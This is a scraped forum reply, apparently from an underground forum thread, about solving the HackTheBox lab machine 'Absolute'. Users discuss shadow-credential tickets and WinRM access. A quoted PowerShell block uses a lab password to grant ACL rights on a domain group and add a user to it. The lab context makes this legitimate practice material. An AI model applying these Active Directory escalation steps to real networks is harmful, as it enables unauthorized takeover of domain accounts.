<div class="post_head">
<div class="float_right" style="vertical-align: top">
<!--<strong><a href="Thread-RaidForums-Official-Telegram?pid=541523#pid541523" title="RaidForums Official Telegram">#1</a></strong>-->
<div class="float_right" style="vertical-align: top">
<strong><a href="Thread-Absolute-HTB-Discussion?pid=541523#pid541523" title="RE: Absolute - HTB [Discussion]">#101</a></strong>
</div>
</div>
<span class="post_date"><span title="September 28, 2022, 03:14 AM">3 hours ago</span> <span class="post_edit" id="edited_by_541523"></span></span>
</div>
<div class="post_body scaleimages" id="pid_541523">
<blockquote class="mycode_quote"><cite><span> (<span title="September 28, 2022, 02:49 AM">4 hours ago</span>)</span>samhub123 Wrote:  <a class="quick_jump" href="https://breached.to/Thread-Absolute-HTB-Discussion?pid=541427#pid541427" rel="nofollow"></a></cite><blockquote class="mycode_quote"><cite><span> (<span title="September 28, 2022, 02:38 AM">4 hours ago</span>)</span>Hacker2222 Wrote:  <a class="quick_jump" href="https://breached.to/Thread-Absolute-HTB-Discussion?pid=541370#pid541370" rel="nofollow"></a></cite><blockquote class="mycode_quote"><cite><span> (<span title="September 28, 2022, 02:16 AM">4 hours ago</span>)</span>samhub123 Wrote:  <a class="quick_jump" href="https://breached.to/Thread-Absolute-HTB-Discussion?pid=541292#pid541292" rel="nofollow"></a></cite>Okay, I was able to get ccahe file for winrm_user using pywhisker.<br>
From that I also got the NThash for winrm_user<br>
<br>
but using CME with hash and also with the ticket, it seems like I cannot access winrm using winrm_user</br></br></br></blockquote><br/>
if u have ccache file then just use evilwinrm?? how ddid u add lovegod to the group tho?</blockquote><br/>
<blockquote class="mycode_quote"><cite>Quote:</cite>$dc_domain="absolute.htb"<br/>
<br/>
$SecPassword = ConvertTo-SecureString "AbsoluteLDAP2022!" -AsPlainText -Force<br/>
$Cred = New-Object System.Management.Automation.PSCredential('absolute.htb\m.lovegod', $SecPassword)<br/>
<br/>
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Network Audit" -Rights all -DomainController dc.absolute.htb  -principalidentity "m.lovegod"<br/>
Add-ADPrincipalGroupMembership -Identity  m.lovegod -MemberOf  'Network Audit' -Credential $Cred -Server dc.absolute.htb<br/>
Get-DomainGroupMember -Identity 'network audit' -Domain $dc_domain -DomainController dc.absolute.htb -Credential $cred</blockquote>
<br/>
Let me know if you get winrm working.</blockquote>thanks ................... need to make windows server vm i think ........ commando vm cant run DomainObjectAcl  i guess ..... will catch up  <img alt="Tongue" class="smilie smilie_5" src="https://breached.to/images/smilies/tongue.png" title="Tongue">
</img></div>
<div class="post_meta" id="post_meta_541523">
<div class="float_right">
</div>
</div>